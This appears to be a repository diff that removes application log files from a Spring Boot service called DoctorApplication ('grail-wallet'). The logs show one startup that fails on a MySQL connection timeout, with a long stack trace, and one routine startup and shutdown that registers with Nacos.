13:57:25.186 [main] ERROR o.s.b.w.e.t.TomcatStarter - [onStartup,61] - Error starting Tomcat context. Exception: org.springframework.beans.factory.UnsatisfiedDependencyException. Message: Error creating bean with name 'webMvcMetricsFilter' defined in class path resource [org/springframework/boot/actuate/autoconfigure/metrics/web/servlet/WebMvcMetricsAutoConfiguration.class]: Unsatisfied dependency expressed through method 'webMvcMetricsFilter' parameter 0; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'simpleMeterRegistry' defined in class path resource [org/springframework/boot/actuate/autoconfigure/metrics/export/simple/SimpleMetricsExportAutoConfiguration.class]: Initialization of bean failed; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'dataSourcePoolMetadataMeterBinder' defined in class path resource [org/springframework/boot/actuate/autoconfigure/metrics/jdbc/DataSourcePoolMetricsAutoConfiguration$DataSourcePoolMetadataMetricsConfiguration.class]: Unsatisfied dependency expressed through method 'dataSourcePoolMetadataMeterBinder' parameter 0; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'dataSource' defined in class path resource [com/baomidou/dynamic/datasource/spring/boot/autoconfigure/DynamicDataSourceAutoConfiguration.class]: Invocation of init method failed; nested exception is com.baomidou.dynamic.datasource.exception.ErrorCreateDataSourceException: druid create error
13:57:25.251 [main] ERROR o.s.b.SpringApplication - [reportFailure,824] - Application run failed
org.springframework.context.ApplicationContextException: Unable to start web server; nested exception is org.springframework.boot.web.server.WebServerException: Unable to start embedded Tomcat
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.onRefresh(ServletWebServerApplicationContext.java:165)
at org.springframework.context.support.AbstractApplicationContext.refresh(AbstractApplicationContext.java:577)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.refresh(ServletWebServerApplicationContext.java:147)
at org.springframework.boot.SpringApplication.refresh(SpringApplication.java:734)
at org.springframework.boot.SpringApplication.refreshContext(SpringApplication.java:408)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:308)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1306)
at org.springframework.boot.SpringApplication.run(SpringApplication.java:1295)
at com.grail.doctor.DoctorApplication.main(DoctorApplication.java:20)
Caused by: org.springframework.boot.web.server.WebServerException: Unable to start embedded Tomcat
at org.springframework.boot.web.embedded.tomcat.TomcatWebServer.initialize(TomcatWebServer.java:142)
at org.springframework.boot.web.embedded.tomcat.TomcatWebServer.<init>(TomcatWebServer.java:104)
at org.springframework.boot.web.embedded.tomcat.TomcatServletWebServerFactory.getTomcatWebServer(TomcatServletWebServerFactory.java:479)
at org.springframework.boot.web.embedded.tomcat.TomcatServletWebServerFactory.getWebServer(TomcatServletWebServerFactory.java:211)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.createWebServer(ServletWebServerApplicationContext.java:184)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.onRefresh(ServletWebServerApplicationContext.java:162)
... 8 common frames omitted
Caused by: org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'webMvcMetricsFilter' defined in class path resource [org/springframework/boot/actuate/autoconfigure/metrics/web/servlet/WebMvcMetricsAutoConfiguration.class]: Unsatisfied dependency expressed through method 'webMvcMetricsFilter' parameter 0; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'simpleMeterRegistry' defined in class path resource [org/springframework/boot/actuate/autoconfigure/metrics/export/simple/SimpleMetricsExportAutoConfiguration.class]: Initialization of bean failed; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'dataSourcePoolMetadataMeterBinder' defined in class path resource [org/springframework/boot/actuate/autoconfigure/metrics/jdbc/DataSourcePoolMetricsAutoConfiguration$DataSourcePoolMetadataMetricsConfiguration.class]: Unsatisfied dependency expressed through method 'dataSourcePoolMetadataMeterBinder' parameter 0; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'dataSource' defined in class path resource [com/baomidou/dynamic/datasource/spring/boot/autoconfigure/DynamicDataSourceAutoConfiguration.class]: Invocation of init method failed; nested exception is com.baomidou.dynamic.datasource.exception.ErrorCreateDataSourceException: druid create error
at org.springframework.beans.factory.support.ConstructorResolver.createArgumentArray(ConstructorResolver.java:800)
at org.springframework.beans.factory.support.ConstructorResolver.instantiateUsingFactoryMethod(ConstructorResolver.java:541)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.instantiateUsingFactoryMethod(AbstractAutowireCapableBeanFactory.java:1352)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBeanInstance(AbstractAutowireCapableBeanFactory.java:1195)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:582)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:542)
at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:335)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:234)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:333)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:213)
at org.springframework.boot.web.servlet.ServletContextInitializerBeans.getOrderedBeansOfType(ServletContextInitializerBeans.java:212)
at org.springframework.boot.web.servlet.ServletContextInitializerBeans.getOrderedBeansOfType(ServletContextInitializerBeans.java:203)
at org.springframework.boot.web.servlet.ServletContextInitializerBeans.addServletContextInitializerBeans(ServletContextInitializerBeans.java:97)
at org.springframework.boot.web.servlet.ServletContextInitializerBeans.<init>(ServletContextInitializerBeans.java:86)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.getServletContextInitializerBeans(ServletWebServerApplicationContext.java:262)
at org.springframework.boot.web.servlet.context.ServletWebServerApplicationContext.selfInitialize(ServletWebServerApplicationContext.java:236)
at org.springframework.boot.web.embedded.tomcat.TomcatStarter.onStartup(TomcatStarter.java:53)
at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5219)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1396)
at org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1386)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at org.apache.tomcat.util.threads.InlineExecutorService.execute(InlineExecutorService.java:75)
at java.base/java.util.concurrent.AbstractExecutorService.submit(AbstractExecutorService.java:145)
at org.apache.catalina.core.ContainerBase.startInternal(ContainerBase.java:919)
at org.apache.catalina.core.StandardHost.startInternal(StandardHost.java:835)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1396)
at org.apache.catalina.core.ContainerBase$StartChild.call(ContainerBase.java:1386)
at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
at org.apache.tomcat.util.threads.InlineExecutorService.execute(InlineExecutorService.java:75)
at java.base/java.util.concurrent.AbstractExecutorService.submit(AbstractExecutorService.java:145)
at org.apache.catalina.core.ContainerBase.startInternal(ContainerBase.java:919)
at org.apache.catalina.core.StandardEngine.startInternal(StandardEngine.java:265)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at org.apache.catalina.core.StandardService.startInternal(StandardService.java:432)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at org.apache.catalina.core.StandardServer.startInternal(StandardServer.java:930)
at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
at org.apache.catalina.startup.Tomcat.start(Tomcat.java:486)
at org.springframework.boot.web.embedded.tomcat.TomcatWebServer.initialize(TomcatWebServer.java:123)
... 13 common frames omitted
Caused by: org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'simpleMeterRegistry' defined in class path resource [org/springframework/boot/actuate/autoconfigure/metrics/export/simple/SimpleMetricsExportAutoConfiguration.class]: Initialization of bean failed; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'dataSourcePoolMetadataMeterBinder' defined in class path resource [org/springframework/boot/actuate/autoconfigure/metrics/jdbc/DataSourcePoolMetricsAutoConfiguration$DataSourcePoolMetadataMetricsConfiguration.class]: Unsatisfied dependency expressed through method 'dataSourcePoolMetadataMeterBinder' parameter 0; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'dataSource' defined in class path resource [com/baomidou/dynamic/datasource/spring/boot/autoconfigure/DynamicDataSourceAutoConfiguration.class]: Invocation of init method failed; nested exception is com.baomidou.dynamic.datasource.exception.ErrorCreateDataSourceException: druid create error
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:628)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:542)
at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:335)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:234)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:333)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:208)
at org.springframework.beans.factory.config.DependencyDescriptor.resolveCandidate(DependencyDescriptor.java:276)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1391)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveDependency(DefaultListableBeanFactory.java:1311)
at org.springframework.beans.factory.support.ConstructorResolver.resolveAutowiredArgument(ConstructorResolver.java:887)
at org.springframework.beans.factory.support.ConstructorResolver.createArgumentArray(ConstructorResolver.java:791)
... 53 common frames omitted
Caused by: org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'dataSourcePoolMetadataMeterBinder' defined in class path resource [org/springframework/boot/actuate/autoconfigure/metrics/jdbc/DataSourcePoolMetricsAutoConfiguration$DataSourcePoolMetadataMetricsConfiguration.class]: Unsatisfied dependency expressed through method 'dataSourcePoolMetadataMeterBinder' parameter 0; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'dataSource' defined in class path resource [com/baomidou/dynamic/datasource/spring/boot/autoconfigure/DynamicDataSourceAutoConfiguration.class]: Invocation of init method failed; nested exception is com.baomidou.dynamic.datasource.exception.ErrorCreateDataSourceException: druid create error
at org.springframework.beans.factory.support.ConstructorResolver.createArgumentArray(ConstructorResolver.java:800)
at org.springframework.beans.factory.support.ConstructorResolver.instantiateUsingFactoryMethod(ConstructorResolver.java:541)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.instantiateUsingFactoryMethod(AbstractAutowireCapableBeanFactory.java:1352)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBeanInstance(AbstractAutowireCapableBeanFactory.java:1195)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:582)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:542)
at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:335)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:234)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:333)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:208)
at org.springframework.beans.factory.config.DependencyDescriptor.resolveCandidate(DependencyDescriptor.java:276)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.addCandidateEntry(DefaultListableBeanFactory.java:1616)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.findAutowireCandidates(DefaultListableBeanFactory.java:1573)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveMultipleBeans(DefaultListableBeanFactory.java:1417)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1349)
at org.springframework.beans.factory.support.DefaultListableBeanFactory$DependencyObjectProvider.resolveStream(DefaultListableBeanFactory.java:2119)
at org.springframework.beans.factory.support.DefaultListableBeanFactory$DependencyObjectProvider.orderedStream(DefaultListableBeanFactory.java:2113)
at org.springframework.boot.actuate.autoconfigure.metrics.MeterRegistryConfigurer.addBinders(MeterRegistryConfigurer.java:86)
at org.springframework.boot.actuate.autoconfigure.metrics.MeterRegistryConfigurer.configure(MeterRegistryConfigurer.java:68)
at org.springframework.boot.actuate.autoconfigure.metrics.MeterRegistryPostProcessor.postProcessAfterInitialization(MeterRegistryPostProcessor.java:64)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.applyBeanPostProcessorsAfterInitialization(AbstractAutowireCapableBeanFactory.java:455)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.initializeBean(AbstractAutowireCapableBeanFactory.java:1808)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:620)
... 63 common frames omitted
Caused by: org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'dataSource' defined in class path resource [com/baomidou/dynamic/datasource/spring/boot/autoconfigure/DynamicDataSourceAutoConfiguration.class]: Invocation of init method failed; nested exception is com.baomidou.dynamic.datasource.exception.ErrorCreateDataSourceException: druid create error
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.initializeBean(AbstractAutowireCapableBeanFactory.java:1804)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.doCreateBean(AbstractAutowireCapableBeanFactory.java:620)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.createBean(AbstractAutowireCapableBeanFactory.java:542)
at org.springframework.beans.factory.support.AbstractBeanFactory.lambda$doGetBean$0(AbstractBeanFactory.java:335)
at org.springframework.beans.factory.support.DefaultSingletonBeanRegistry.getSingleton(DefaultSingletonBeanRegistry.java:234)
at org.springframework.beans.factory.support.AbstractBeanFactory.doGetBean(AbstractBeanFactory.java:333)
at org.springframework.beans.factory.support.AbstractBeanFactory.getBean(AbstractBeanFactory.java:208)
at org.springframework.beans.factory.config.DependencyDescriptor.resolveCandidate(DependencyDescriptor.java:276)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.addCandidateEntry(DefaultListableBeanFactory.java:1609)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.findAutowireCandidates(DefaultListableBeanFactory.java:1573)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveMultipleBeans(DefaultListableBeanFactory.java:1492)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.doResolveDependency(DefaultListableBeanFactory.java:1349)
at org.springframework.beans.factory.support.DefaultListableBeanFactory.resolveDependency(DefaultListableBeanFactory.java:1311)
at org.springframework.beans.factory.support.ConstructorResolver.resolveAutowiredArgument(ConstructorResolver.java:887)
at org.springframework.beans.factory.support.ConstructorResolver.createArgumentArray(ConstructorResolver.java:791)
... 85 common frames omitted
Caused by: com.baomidou.dynamic.datasource.exception.ErrorCreateDataSourceException: druid create error
at com.baomidou.dynamic.datasource.creator.DruidDataSourceCreator.doCreateDataSource(DruidDataSourceCreator.java:87)
at com.baomidou.dynamic.datasource.creator.AbstractDataSourceCreator.createDataSource(AbstractDataSourceCreator.java:70)
at com.baomidou.dynamic.datasource.creator.DefaultDataSourceCreator.createDataSource(DefaultDataSourceCreator.java:48)
at com.baomidou.dynamic.datasource.provider.AbstractDataSourceProvider.createDataSourceMap(AbstractDataSourceProvider.java:47)
at com.baomidou.dynamic.datasource.provider.YmlDynamicDataSourceProvider.loadDataSources(YmlDynamicDataSourceProvider.java:42)
at com.baomidou.dynamic.datasource.DynamicRoutingDataSource.afterPropertiesSet(DynamicRoutingDataSource.java:219)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.invokeInitMethods(AbstractAutowireCapableBeanFactory.java:1863)
at org.springframework.beans.factory.support.AbstractAutowireCapableBeanFactory.initializeBean(AbstractAutowireCapableBeanFactory.java:1800)
... 99 common frames omitted
Caused by: com.mysql.cj.jdbc.exceptions.CommunicationsException: Communications link failure
The last packet sent successfully to the server was 0 milliseconds ago. The driver has not received any packets from the server.
at com.mysql.cj.jdbc.exceptions.SQLError.createCommunicationsException(SQLError.java:174)
at com.mysql.cj.jdbc.exceptions.SQLExceptionsMapping.translateException(SQLExceptionsMapping.java:64)
at com.mysql.cj.jdbc.ConnectionImpl.createNewIO(ConnectionImpl.java:828)
at com.mysql.cj.jdbc.ConnectionImpl.<init>(ConnectionImpl.java:448)
at com.mysql.cj.jdbc.ConnectionImpl.getInstance(ConnectionImpl.java:241)
at com.mysql.cj.jdbc.NonRegisteringDriver.connect(NonRegisteringDriver.java:198)
at com.alibaba.druid.filter.FilterChainImpl.connection_connect(FilterChainImpl.java:118)
at com.alibaba.druid.filter.FilterAdapter.connection_connect(FilterAdapter.java:764)
at com.alibaba.druid.filter.FilterEventAdapter.connection_connect(FilterEventAdapter.java:33)
at com.alibaba.druid.filter.FilterChainImpl.connection_connect(FilterChainImpl.java:112)
at com.alibaba.druid.filter.stat.StatFilter.connection_connect(StatFilter.java:232)
at com.alibaba.druid.filter.FilterChainImpl.connection_connect(FilterChainImpl.java:112)
at com.alibaba.druid.pool.DruidAbstractDataSource.createPhysicalConnection(DruidAbstractDataSource.java:1645)
at com.alibaba.druid.pool.DruidAbstractDataSource.createPhysicalConnection(DruidAbstractDataSource.java:1709)
at com.alibaba.druid.pool.DruidDataSource.init(DruidDataSource.java:901)
at com.baomidou.dynamic.datasource.creator.DruidDataSourceCreator.doCreateDataSource(DruidDataSourceCreator.java:85)
... 106 common frames omitted
Caused by: com.mysql.cj.exceptions.CJCommunicationsException: Communications link failure
The last packet sent successfully to the server was 0 milliseconds ago. The driver has not received any packets from the server.
at java.base/jdk.internal.reflect.DirectConstructorHandleAccessor.newInstance(DirectConstructorHandleAccessor.java:67)
at java.base/java.lang.reflect.Constructor.newInstanceWithCaller(Constructor.java:499)
at java.base/java.lang.reflect.Constructor.newInstance(Constructor.java:483)
at com.mysql.cj.exceptions.ExceptionFactory.createException(ExceptionFactory.java:61)
at com.mysql.cj.exceptions.ExceptionFactory.createException(ExceptionFactory.java:105)
at com.mysql.cj.exceptions.ExceptionFactory.createException(ExceptionFactory.java:151)
at com.mysql.cj.exceptions.ExceptionFactory.createCommunicationsException(ExceptionFactory.java:167)
at com.mysql.cj.protocol.a.NativeSocketConnection.connect(NativeSocketConnection.java:89)
at com.mysql.cj.NativeSession.connect(NativeSession.java:120)
at com.mysql.cj.jdbc.ConnectionImpl.connectOneTryOnly(ConnectionImpl.java:948)
at com.mysql.cj.jdbc.ConnectionImpl.createNewIO(ConnectionImpl.java:818)
... 119 common frames omitted
Caused by: java.net.ConnectException: Connection timed out: connect
at java.base/sun.nio.ch.Net.connect0(Native Method)
at java.base/sun.nio.ch.Net.connect(Net.java:579)
at java.base/sun.nio.ch.Net.connect(Net.java:568)
at java.base/sun.nio.ch.NioSocketImpl.connect(NioSocketImpl.java:585)
at java.base/java.net.SocksSocketImpl.connect(SocksSocketImpl.java:327)
at java.base/java.net.Socket.connect(Socket.java:633)
at com.mysql.cj.protocol.StandardSocketFactory.connect(StandardSocketFactory.java:153)
at com.mysql.cj.protocol.a.NativeSocketConnection.connect(NativeSocketConnection.java:63)
... 122 common frames omitted

View File

@ -1,56 +0,0 @@
20:47:27.436 [background-preinit] INFO o.h.v.i.util.Version - [<clinit>,21] - HV000001: Hibernate Validator 6.2.3.Final
20:47:29.247 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of 7043ecb2-f71d-44ef-ab04-c08947a49475_config-0
20:47:29.293 [main] INFO o.r.Reflections - [scan,232] - Reflections took 25 ms to scan 1 urls, producing 3 keys and 6 values
20:47:29.316 [main] INFO o.r.Reflections - [scan,232] - Reflections took 10 ms to scan 1 urls, producing 4 keys and 9 values
20:47:29.338 [main] INFO o.r.Reflections - [scan,232] - Reflections took 21 ms to scan 1 urls, producing 3 keys and 10 values
20:47:29.346 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 5 values
20:47:29.353 [main] INFO o.r.Reflections - [scan,232] - Reflections took 6 ms to scan 1 urls, producing 1 keys and 7 values
20:47:29.361 [main] INFO o.r.Reflections - [scan,232] - Reflections took 6 ms to scan 1 urls, producing 2 keys and 8 values
20:47:29.364 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7043ecb2-f71d-44ef-ab04-c08947a49475_config-0] RpcClient init label, labels = {module=config, Vipserver-Tag=null, source=sdk, Amory-Tag=null, Location-Tag=null, taskId=0, AppName=unknown}
20:47:29.365 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7043ecb2-f71d-44ef-ab04-c08947a49475_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$464/0x0000000800f62238
20:47:29.365 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7043ecb2-f71d-44ef-ab04-c08947a49475_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$465/0x0000000800f62448
20:47:29.365 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7043ecb2-f71d-44ef-ab04-c08947a49475_config-0] Registry connection listener to current client:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$1
20:47:29.366 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7043ecb2-f71d-44ef-ab04-c08947a49475_config-0] RpcClient init, ServerListFactory = com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$2
20:47:29.372 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7043ecb2-f71d-44ef-ab04-c08947a49475_config-0] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
20:47:30.635 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7043ecb2-f71d-44ef-ab04-c08947a49475_config-0] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698324449713_10.100.1.1_64120
20:47:30.636 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7043ecb2-f71d-44ef-ab04-c08947a49475_config-0] Notify connected event to listeners.
20:47:30.636 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7043ecb2-f71d-44ef-ab04-c08947a49475_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
20:47:30.636 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [7043ecb2-f71d-44ef-ab04-c08947a49475_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d25c0
20:47:30.838 [main] INFO c.g.d.DoctorApplication - [logStartupProfileInfo,640] - The following 1 profile is active: "dev"
20:47:32.737 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Initializing ProtocolHandler ["http-nio-10001"]
20:47:32.737 [main] INFO o.a.c.c.StandardService - [log,173] - Starting service [Tomcat]
20:47:32.737 [main] INFO o.a.c.c.StandardEngine - [log,173] - Starting Servlet engine: [Apache Tomcat/9.0.65]
20:47:32.878 [main] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring embedded WebApplicationContext
20:47:35.877 [main] INFO c.a.d.p.DruidDataSource - [init,972] - {dataSource-1,master} inited
20:47:35.878 [main] INFO c.b.d.d.DynamicRoutingDataSource - [addDataSource,148] - dynamic-datasource - add a datasource named [master] success
20:47:35.879 [main] INFO c.b.d.d.DynamicRoutingDataSource - [afterPropertiesSet,228] - dynamic-datasource initial loaded [1] datasource,primary datasource named [master]
20:47:36.554 [main] INFO c.a.c.s.SentinelWebMvcConfigurer - [addInterceptors,52] - [Sentinel Starter] register SentinelWebInterceptor with urlPatterns: [/**].
20:47:38.114 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of 1c1ff132-b067-4020-be84-2aae4f609153
20:47:38.114 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1c1ff132-b067-4020-be84-2aae4f609153] RpcClient init label, labels = {module=naming, source=sdk}
20:47:38.115 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1c1ff132-b067-4020-be84-2aae4f609153] RpcClient init, ServerListFactory = com.alibaba.nacos.client.naming.core.ServerListManager
20:47:38.115 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1c1ff132-b067-4020-be84-2aae4f609153] Registry connection listener to current client:com.alibaba.nacos.client.naming.remote.gprc.redo.NamingGrpcRedoService
20:47:38.115 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1c1ff132-b067-4020-be84-2aae4f609153] Register server push request handler:com.alibaba.nacos.client.naming.remote.gprc.NamingPushRequestHandler
20:47:38.116 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1c1ff132-b067-4020-be84-2aae4f609153] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
20:47:38.349 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1c1ff132-b067-4020-be84-2aae4f609153] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698324457473_10.100.1.1_64130
20:47:38.349 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1c1ff132-b067-4020-be84-2aae4f609153] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
20:47:38.349 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1c1ff132-b067-4020-be84-2aae4f609153] Notify connected event to listeners.
20:47:38.349 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1c1ff132-b067-4020-be84-2aae4f609153] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d25c0
20:47:41.726 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Starting ProtocolHandler ["http-nio-10001"]
20:47:41.783 [main] INFO c.a.c.n.r.NacosServiceRegistry - [register,75] - nacos registry, DEFAULT_GROUP grail-wallet 192.168.80.1:10001 register finished
20:47:42.315 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1c1ff132-b067-4020-be84-2aae4f609153] Receive server push request, request = NotifySubscriberRequest, requestId = 1254
20:47:42.318 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1c1ff132-b067-4020-be84-2aae4f609153] Ack server push request, request = NotifySubscriberRequest, requestId = 1254
20:47:43.219 [main] INFO c.g.d.DoctorApplication - [logStarted,61] - Started DoctorApplication in 17.546 seconds (JVM running for 18.673)
20:47:43.228 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-wallet.yml, group=DEFAULT_GROUP
20:47:43.230 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-wallet-dev.yml, group=DEFAULT_GROUP
20:47:43.230 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-wallet, group=DEFAULT_GROUP
20:47:43.349 [RMI TCP Connection(1)-10.3.214.20] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring DispatcherServlet 'dispatcherServlet'
20:47:51.022 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,94] - De-registering from Nacos Server now...
20:47:51.062 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,114] - De-registration finished.
20:47:51.398 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,454] - Shutdown rpc client, set status to shutdown
20:47:51.399 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,456] - Shutdown client event executor java.util.concurrent.ScheduledThreadPoolExecutor@64f7bec6[Running, pool size = 2, active threads = 2, queued tasks = 0, completed tasks = 0]
20:47:51.399 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [closeConnection,591] - Close current connection 1698324457473_10.100.1.1_64130
20:47:51.402 [SpringApplicationShutdownHook] INFO c.a.n.c.r.c.g.GrpcClient - [shutdown,85] - Shutdown grpc executor java.util.concurrent.ThreadPoolExecutor@7c83b1a[Running, pool size = 8, active threads = 0, queued tasks = 0, completed tasks = 11]
20:47:51.533 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,205] - dynamic-datasource start closing ....
20:47:51.535 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2051] - {dataSource-1} closing ...
20:47:51.539 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2124] - {dataSource-1} closed
20:47:51.539 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,209] - dynamic-datasource all closed success,bye

View File

@ -1,521 +0,0 @@
08:36:52.573 [background-preinit] INFO o.h.v.i.util.Version - [<clinit>,21] - HV000001: Hibernate Validator 6.2.3.Final
08:36:54.371 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of c4fe8326-a9bf-40ef-bd5f-b1326af5d3f6_config-0
